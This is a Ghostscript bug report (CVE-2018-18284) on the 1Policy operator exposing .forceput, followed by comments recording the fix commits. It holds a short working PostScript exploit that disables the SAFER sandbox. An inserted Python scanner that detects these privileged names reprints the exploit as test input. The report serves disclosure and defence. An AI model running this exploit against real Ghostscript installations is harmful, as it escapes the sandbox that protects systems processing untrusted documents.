Bug 699963

Summary: 1Policy is a dangerous operator, any callers should be odef
Product: Ghostscript
Reporter: Tavis Ormandy <taviso>
Component: Security (public)
Assignee: Ken Sharp <ken.sharp>
Status: RESOLVED FIXED
Severity: normal
CC: cbuissar
Priority: P4
Version: unspecified
Hardware: PC
OS: Linux

Description Tavis Ormandy 2018-10-12 21:47:39 UTC
1Policy (from gs_setpd.ps) is basically a wrapper around .forceput, and therefore any callers need to be pseudo-operators.

Exploit:

/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def

GS>systemdict /SAFER false .forceput
GS>SAFER ==
false

See bug 699816 for a full forceput exploit.
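An added detection example (not part of this bug report or of Ghostscript's own code): a small Python scanner that tokenizes PostScript well enough to skip comments and string bodies, then reports every privileged name used as an executable reference or as a literal key, which is the shape the `.forceput` redefinition and the `systemdict /SAFER false .forceput` call above take. The set of flagged names and the sample input are assumptions constructed for this example.

```python
import re
# Names worth flagging in untrusted PostScript (an assumed set, seeded from this report).
PRIVILEGED_NAMES = {".forceput", ".policyprocs", "1Policy", "SAFER", "systemdict"}

# Comment, start of a string, structural delimiters, or a (literal) name / number.
TOKEN_RE = re.compile(r"%[^\n]*|\(|<<|>>|[\[\]{}]|/?[^\s()<>\[\]{}/%]+")

def skip_string(src, i):
    """Return the index just past the string opened at src[i]; handles nesting and escapes."""
    depth = 0
    while i < len(src):
        c, i = src[i], i + 1
        if c == "\\":
            i += 1          # skip the escaped character
            continue
        depth += (c == "(") - (c == ")")
        if depth == 0:
            return i
    return i

def tokenize(src):
    """Yield (line_no, token), skipping comments and string bodies."""
    i = 0
    while i < len(src):
        m = TOKEN_RE.match(src, i)
        if not m:                   # whitespace or a stray delimiter: skip it
            i += 1
        elif m.group(0) == "(":
            i = skip_string(src, i)
        else:
            i = m.end()
            if not m.group(0).startswith("%"):
                yield src.count("\n", 0, m.start()) + 1, m.group(0)

def scan(src):
    """Return (line_no, kind, name) for each privileged name used executably or as a literal key."""
    findings = []
    for line_no, tok in tokenize(src):
        name = tok.lstrip("/")
        if name in PRIVILEGED_NAMES:
            findings.append((line_no, "literal" if tok[0] == "/" else "reference", name))
    return findings

# Constructed sample: the snippet from the report plus a harmless mention inside a string.
SAMPLE = """%!PS
(.forceput inside a string is ignored) pop
/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def
systemdict /SAFER false .forceput
"""
```

Running `scan(SAMPLE)` reports the literal `/.forceput` being defined on line 3 and the `systemdict` / `/SAFER` / `.forceput` triple on line 4, while the string on line 2 produces nothing.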
Comment 1 Tavis Ormandy 2018-10-13 00:28:10 UTC
This is CVE-2018-18284
Comment 2 Ken Sharp 2018-10-15 10:29:31 UTC
I have a fix but I want Chris to review it, so it'll be tomorrow before it gets applied, assuming Chris is happy with the change.
Comment 3 Ken Sharp 2018-10-16 08:35:38 UTC
Fixed in commit 30cd347f37bfb293ffdc407397d1023628400b81
Comment 4 Ken Sharp 2018-10-16 08:36:45 UTC
Oops :-( Wrong way round. This one is fixed with *this* commit 8d19fdf63f91f50466b08f23e2d93d37a4c5ea0b